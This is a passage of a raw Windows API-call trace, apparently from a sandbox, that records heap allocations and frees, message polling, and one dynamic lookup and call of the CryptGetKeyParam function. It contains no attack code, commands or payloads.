lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.494] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.494] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0162.495] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.495] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.495] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0162.496] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.496] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.496] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0162.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0162.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.498] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0162.499] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2718, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2718*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.501] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0162.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, 